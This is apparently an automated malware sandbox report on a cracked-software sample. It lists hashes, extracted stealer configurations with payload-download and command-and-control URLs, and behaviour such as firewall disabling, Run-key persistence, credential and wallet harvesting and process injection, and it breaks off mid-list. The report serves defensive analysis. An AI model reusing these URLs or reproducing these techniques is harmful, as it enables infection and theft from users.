Overview
overview
10Static
static
101.bin/1.exe
windows10_x64
102019-09-02...10.exe
windows10_x64
1031.exe
windows10_x64
103DMark 11 ...on.exe
windows10_x64
15da0116af4...18.exe
windows10_x64
10Archive.zi...3e.exe
windows10_x64
6CVE-2018-1...oC.swf
windows10_x64
3CVWSHSetup...1].exe
windows10_x64
4DiskIntern...en.exe
windows10_x64
1ForceOp 2....ce.exe
windows10_x64
10HYDRA.exe
windows10_x64
10Keygen.exe
windows10_x64
10Lonelyscre...ox.exe
windows10_x64
1LtHv0O2KZDK4M637.exe
windows10_x64
10Magic_File...ja.exe
windows10_x64
1OnlineInstaller.exe
windows10_x64
10Remouse.Mi...cg.exe
windows10_x64
1SecurityTa...up.exe
windows10_x64
8Treasure.V...ox.exe
windows10_x64
1VyprVPN.exe
windows10_x64
10WSHSetup[1].exe
windows10_x64
3___ _ ____....exe
windows10_x64
10___ _ ____....exe
windows10_x64
10amtemu.v0....ed.exe
windows10_x64
10api.exe
windows10_x64
1default.exe
windows10_x64
10efd97b1038...ea4.js
windows10_x64
3good.exe
windows10_x64
10infected d...er.exe
windows10_x64
8oof.exe
windows10_x64
10ou55sg33s_1.exe
windows10_x64
10update.exe
windows10_x64
10Resubmissions
12-11-2021 18:04
211112-wnzb8aahhm 1019-11-2020 10:08
201119-rhwlt38jrx 1018-11-2020 17:26
201118-htd4fq29va 10Analysis
-
max time kernel
338s -
max time network
336s -
platform
windows10_x64 -
resource
win10-en-20211104 -
submitted
12-11-2021 18:04
Behavioral task
behavioral1
Sample
1.bin/1.exe
Resource
win10-en-20211014
Behavioral task
behavioral2
Sample
2019-09-02_22-41-10.exe
Resource
win10-en-20211104
Behavioral task
behavioral3
Sample
31.exe
Resource
win10-en-20211014
Behavioral task
behavioral4
Sample
3DMark 11 Advanced Edition.exe
Resource
win10-en-20211104
Behavioral task
behavioral5
Sample
5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
Resource
win10-en-20211104
Behavioral task
behavioral6
Sample
Archive.zip__ccacaxs2tbz2t6ob3e.exe
Resource
win10-en-20211014
Behavioral task
behavioral7
Sample
CVE-2018-15982_PoC.swf
Resource
win10-en-20211104
Behavioral task
behavioral8
Sample
CVWSHSetup[1].bin/WSHSetup[1].exe
Resource
win10-en-20211014
Behavioral task
behavioral9
Sample
DiskInternals_Uneraser_v5_keygen.exe
Resource
win10-en-20211104
Behavioral task
behavioral10
Sample
ForceOp 2.8.7 - By RaiSence.exe
Resource
win10-en-20211014
Behavioral task
behavioral11
Sample
HYDRA.exe
Resource
win10-en-20211104
Behavioral task
behavioral12
Sample
Keygen.exe
Resource
win10-en-20211104
Behavioral task
behavioral13
Sample
Lonelyscreen.1.2.9.keygen.by.Paradox/Lonelyscreen.1.2.9.keygen.by.Paradox.exe
Resource
win10-en-20211014
Behavioral task
behavioral14
Sample
LtHv0O2KZDK4M637.exe
Resource
win10-en-20211104
Behavioral task
behavioral15
Sample
Magic_File_v3_keygen_by_KeygenNinja.exe
Resource
win10-en-20211014
Behavioral task
behavioral16
Sample
OnlineInstaller.exe
Resource
win10-en-20211104
Behavioral task
behavioral17
Sample
Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe
Resource
win10-en-20211014
Behavioral task
behavioral18
Sample
SecurityTaskManager_Setup.exe
Resource
win10-en-20211104
Behavioral task
behavioral19
Sample
Treasure.Vault.3D.Screensaver.keygen.by.Paradox.exe
Resource
win10-en-20211104
Behavioral task
behavioral20
Sample
VyprVPN.exe
Resource
win10-en-20211014
Behavioral task
behavioral21
Sample
WSHSetup[1].exe
Resource
win10-en-20211104
Behavioral task
behavioral22
Sample
___ _ _____ __ ___/์ ์ฐ ๋ฐ ๋น์ ์ฐ์๋ฃ ๋ณด์กด ์์ฒญ์/์ ์ฐ ๋ฐ ๋น์ ์ฐ์๋ฃ ๋ณด์กด ์.exe
Resource
win10-en-20211014
Behavioral task
behavioral23
Sample
___ _ _____ __ ___/์ ์ฐ ๋ฐ ๋น์ ์ฐ์๋ฃ ๋ณด์กด ์์ฒญ์/์ ์ฐ ๋ฐ ๋น์ ์ฐ์๋ฃ ๋ณด์กด ์.exe
Resource
win10-en-20211104
Behavioral task
behavioral24
Sample
amtemu.v0.9.2.win-painter_edited.exe
Resource
win10-en-20211104
Behavioral task
behavioral25
Sample
api.exe
Resource
win10-en-20211014
Behavioral task
behavioral26
Sample
default.exe
Resource
win10-en-20211104
Behavioral task
behavioral27
Sample
efd97b1038e063779fb32a3ab35adc481679a5c6c8e3f4f69c44987ff08b6ea4.js
Resource
win10-en-20211014
Behavioral task
behavioral28
Sample
good.exe
Resource
win10-en-20211104
Behavioral task
behavioral29
Sample
infected dot net installer.exe
Resource
win10-en-20211014
Behavioral task
behavioral30
Sample
oof.exe
Resource
win10-en-20211104
Behavioral task
behavioral31
Sample
ou55sg33s_1.exe
Resource
win10-en-20211014
General
-
Target
amtemu.v0.9.2.win-painter_edited.exe
-
Size
3.5MB
-
MD5
88124e4aba906259af28a466774431ea
-
SHA1
fbc1c27e0d7177238ec99481ffa7d839d1f51594
-
SHA256
1b94ce5e3fb24f02cd970bf09031482d4e2bafebcaafc3f477a735d483e13dbd
-
SHA512
cdc0af6ea2686d35e4a77f4eb802ba9e41819b052253071a397601bec4d6232e5351d21b5d8ab4644e9f6ffd67057ec8c6f2db8605b429afcdf7b3ecd8005e2d
Malware Config
Extracted
http://bit.do/fqhJv
http://bit.do/fqhJv
Extracted
http://bit.do/fqhHT
http://bit.do/fqhHT
Extracted
http://pdshcjvnv.ug/zxcvb.exe
http://pdshcjvnv.ug/zxcvb.exe
Extracted
http://bit.do/fqhJD
http://bit.do/fqhJD
Extracted
http://rbcxvnb.ug/zxcvb.exe
http://rbcxvnb.ug/zxcvb.exe
Extracted
http://zxvbcrt.ug/zxcvb.exe
http://zxvbcrt.ug/zxcvb.exe
Extracted
raccoon
32365171a31c4583d6e3b7aad1690e41cefc38eb
-
url4cnc
http://telegalive.top/brikitiki
http://toptelete.top/brikitiki
http://telegraf.top/brikitiki
https://t.me/brikitiki
Extracted
oski
colonna.ac.ug
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Modifies firewall policy service 2 TTPs 4 IoCs
Processes:
explorer.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0" explorer.exe -
Oski
Oski is an infostealer targeting browser data, crypto wallets.
-
suricata: ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz
suricata: ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M18
suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M18
-
suricata: ET MALWARE Win32/Neurevt.A/Betabot Check-in 4
suricata: ET MALWARE Win32/Neurevt.A/Betabot Check-in 4
-
Blocklisted process makes network request 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeflow pid process 32 428 powershell.exe 34 428 powershell.exe 36 3188 powershell.exe 37 4136 powershell.exe 47 3324 powershell.exe 49 3324 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
cmd.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts cmd.exe -
Executes dropped EXE 38 IoCs
Processes:
key.exeMicrosoft.VisualStudio.Package.LanguageService.11.0.exedata.datbb.exebb.exeputtty.exeereds.exeKeygen.exemwh.exegev.exemwh.exegev.exegev.exeUxqcrfgglyzuwogibeigruaconsoleapp12.exeUxqcrfgglyzuwogibeigruaconsoleapp12.exevkr.execdvcxsdme.exevbndfgame.exeUxqcrfgglyzuwogibeigruaconsoleapp12.exeDxndvkhrxwosconsoleapp14.exeUxqcrfgglyzuwogibeigruaconsoleapp12.exeDxndvkhrxwosconsoleapp14.execc.exepm.exeDxndvkhrxwosconsoleapp14.exeDxndvkhrxwosconsoleapp14.exeaspnet_compiler.execc.exefodhelper.exefodhelper.exevkr.exevbndfgame.execdvcxsdme.exefodhelper.exefodhelper.exefodhelper.exefodhelper.exefodhelper.exepid process 920 key.exe 2088 Microsoft.VisualStudio.Package.LanguageService.11.0.exe 3560 data.dat 3116 bb.exe 1276 bb.exe 1808 puttty.exe 1308 ereds.exe 972 Keygen.exe 4884 mwh.exe 4900 gev.exe 4964 mwh.exe 4880 gev.exe 2132 gev.exe 2696 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe 3104 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe 5100 vkr.exe 1764 cdvcxsdme.exe 4700 vbndfgame.exe 3988 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe 700 Dxndvkhrxwosconsoleapp14.exe 4312 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe 5032 Dxndvkhrxwosconsoleapp14.exe 4552 cc.exe 1336 pm.exe 4888 Dxndvkhrxwosconsoleapp14.exe 4964 Dxndvkhrxwosconsoleapp14.exe 4384 aspnet_compiler.exe 1164 cc.exe 3484 fodhelper.exe 1668 fodhelper.exe 1320 vkr.exe 4880 vbndfgame.exe 1440 cdvcxsdme.exe 4424 fodhelper.exe 1676 fodhelper.exe 4548 fodhelper.exe 4560 fodhelper.exe 1264 fodhelper.exe -
Sets file execution options in registry 2 TTPs
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
explorer.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorer.exe -
Loads dropped DLL 14 IoCs
Processes:
data.datUxqcrfgglyzuwogibeigruaconsoleapp12.exeDxndvkhrxwosconsoleapp14.exeDxndvkhrxwosconsoleapp14.exevbndfgame.exepid process 3560 data.dat 3988 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe 3988 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe 3988 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe 3988 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe 4888 Dxndvkhrxwosconsoleapp14.exe 4888 Dxndvkhrxwosconsoleapp14.exe 4888 Dxndvkhrxwosconsoleapp14.exe 4964 Dxndvkhrxwosconsoleapp14.exe 4964 Dxndvkhrxwosconsoleapp14.exe 4964 Dxndvkhrxwosconsoleapp14.exe 4880 vbndfgame.exe 4880 vbndfgame.exe 4880 vbndfgame.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
Uxqcrfgglyzuwogibeigruaconsoleapp12.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Uxqcrfgglyzuwogibeigruaconsoleapp12.exe Key opened \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook Uxqcrfgglyzuwogibeigruaconsoleapp12.exe Key opened \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook Uxqcrfgglyzuwogibeigruaconsoleapp12.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 7 IoCs
Processes:
explorer.exedata.datpm.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows\CurrentVersion\Run\Google Updater 5.0 = "\"C:\\ProgramData\\Google Updater 5.0\\iqw3o1755773.exe\"" explorer.exe Key created \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run data.dat Set value (str) \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows\CurrentVersion\Run\Google Updater 5.0 = "\"C:\\ProgramData\\Google Updater 5.0\\iqw3o1755773.exe\"" data.dat Set value (str) \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows\CurrentVersion\Run\winda = "\"C:\\Users\\Admin\\AppData\\Roaming\\winda.exe\"" pm.exe Key created \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Google Updater 5.0 = "C:\\ProgramData\\Google Updater 5.0\\iqw3o1755773.exe" explorer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
cmd.exeWScript.exeDxndvkhrxwosconsoleapp14.execmd.exeMicrosoft.VisualStudio.Package.LanguageService.11.0.exemshta.exemshta.exemshta.exeUxqcrfgglyzuwogibeigruaconsoleapp12.exeDxndvkhrxwosconsoleapp14.exefodhelper.exeereds.exemshta.execmd.exemshta.exegev.exevkr.execdvcxsdme.exebb.exeKeygen.exekey.exegev.exefodhelper.exeputtty.exefodhelper.exedata.datUxqcrfgglyzuwogibeigruaconsoleapp12.execmd.exevbndfgame.exefodhelper.exemshta.exemwh.exeWScript.execmd.execc.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cmd.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA WScript.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Dxndvkhrxwosconsoleapp14.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cmd.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Microsoft.VisualStudio.Package.LanguageService.11.0.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Uxqcrfgglyzuwogibeigruaconsoleapp12.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Dxndvkhrxwosconsoleapp14.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA fodhelper.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ereds.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cmd.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA gev.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA vkr.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cdvcxsdme.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA bb.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Keygen.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA key.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA gev.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA fodhelper.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA puttty.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA fodhelper.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA data.dat Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Uxqcrfgglyzuwogibeigruaconsoleapp12.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cmd.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA vbndfgame.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA fodhelper.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mwh.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA WScript.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cmd.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cc.exe -
Maps connected drives based on registry 3 TTPs 64 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
mwh.execmd.execmd.exeKeygen.exekey.execmd.exeUxqcrfgglyzuwogibeigruaconsoleapp12.exeUxqcrfgglyzuwogibeigruaconsoleapp12.exepowershell.exefodhelper.exeDxndvkhrxwosconsoleapp14.exepowershell.exemshta.exevbndfgame.exefodhelper.exefodhelper.exedata.datereds.exevkr.exeMicrosoft.VisualStudio.Package.LanguageService.11.0.execmd.execdvcxsdme.exeWerFault.exemshta.exegev.exegev.exepowershell.execc.execmd.exeputtty.exefodhelper.exedw20.exeDxndvkhrxwosconsoleapp14.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 mwh.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum cmd.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 Keygen.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum key.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 cmd.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum powershell.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 fodhelper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum Dxndvkhrxwosconsoleapp14.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum Keygen.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum mshta.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum vbndfgame.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum fodhelper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum fodhelper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum fodhelper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum data.dat Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 ereds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum cmd.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 vkr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 Microsoft.VisualStudio.Package.LanguageService.11.0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum Uxqcrfgglyzuwogibeigruaconsoleapp12.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 cdvcxsdme.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 WerFault.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 data.dat Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum mshta.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 gev.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum mwh.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 mshta.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum gev.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum cdvcxsdme.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum Uxqcrfgglyzuwogibeigruaconsoleapp12.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 gev.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum vkr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum cc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 fodhelper.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 cmd.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 Dxndvkhrxwosconsoleapp14.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum cmd.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 vbndfgame.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 puttty.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 key.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum WerFault.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 fodhelper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum puttty.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum ereds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum fodhelper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum dw20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum Dxndvkhrxwosconsoleapp14.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 cmd.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 fodhelper.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum gev.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 Dxndvkhrxwosconsoleapp14.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 cc.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
Processes:
bb.exeexplorer.exedata.datMicrosoft.VisualStudio.Package.LanguageService.11.0.exeputtty.exeereds.exeKeygen.exedw20.execmd.exemshta.exemshta.exepowershell.exekey.execmd.exepowershell.exepowershell.exepid process 1276 bb.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 3560 data.dat 2088 Microsoft.VisualStudio.Package.LanguageService.11.0.exe 3560 data.dat 3560 data.dat 3560 data.dat 2088 Microsoft.VisualStudio.Package.LanguageService.11.0.exe 2088 Microsoft.VisualStudio.Package.LanguageService.11.0.exe 2088 Microsoft.VisualStudio.Package.LanguageService.11.0.exe 1808 puttty.exe 1808 puttty.exe 1808 puttty.exe 2220 explorer.exe 1808 puttty.exe 1308 ereds.exe 1308 ereds.exe 1308 ereds.exe 1308 ereds.exe 2220 explorer.exe 972 Keygen.exe 2376 dw20.exe 832 cmd.exe 972 Keygen.exe 972 Keygen.exe 972 Keygen.exe 2376 dw20.exe 2376 dw20.exe 2376 dw20.exe 832 cmd.exe 832 cmd.exe 832 cmd.exe 1936 mshta.exe 1936 mshta.exe 1936 mshta.exe 1936 mshta.exe 1392 mshta.exe 1392 mshta.exe 1392 mshta.exe 1392 mshta.exe 4136 powershell.exe 4136 powershell.exe 4136 powershell.exe 4136 powershell.exe 920 key.exe 920 key.exe 920 key.exe 920 key.exe 1408 cmd.exe 4368 powershell.exe 1408 cmd.exe 1408 cmd.exe 1408 cmd.exe 4368 powershell.exe 4368 powershell.exe 4368 powershell.exe 3324 powershell.exe 3324 powershell.exe 3324 powershell.exe -
Suspicious use of SetThreadContext 15 IoCs
Processes:
bb.exemwh.exegev.exeUxqcrfgglyzuwogibeigruaconsoleapp12.exeUxqcrfgglyzuwogibeigruaconsoleapp12.exeDxndvkhrxwosconsoleapp14.exeDxndvkhrxwosconsoleapp14.exepm.execc.exefodhelper.exevkr.exevbndfgame.execdvcxsdme.exefodhelper.exefodhelper.exedescription pid process target process PID 3116 set thread context of 1276 3116 bb.exe bb.exe PID 4884 set thread context of 4964 4884 mwh.exe mwh.exe PID 4900 set thread context of 2132 4900 gev.exe gev.exe PID 2696 set thread context of 3988 2696 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe Uxqcrfgglyzuwogibeigruaconsoleapp12.exe PID 3104 set thread context of 4312 3104 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe Uxqcrfgglyzuwogibeigruaconsoleapp12.exe PID 700 set thread context of 4888 700 Dxndvkhrxwosconsoleapp14.exe Dxndvkhrxwosconsoleapp14.exe PID 5032 set thread context of 4964 5032 Dxndvkhrxwosconsoleapp14.exe Dxndvkhrxwosconsoleapp14.exe PID 1336 set thread context of 4384 1336 pm.exe aspnet_compiler.exe PID 4552 set thread context of 1164 4552 cc.exe cc.exe PID 3484 set thread context of 1668 3484 fodhelper.exe fodhelper.exe PID 5100 set thread context of 1320 5100 vkr.exe vkr.exe PID 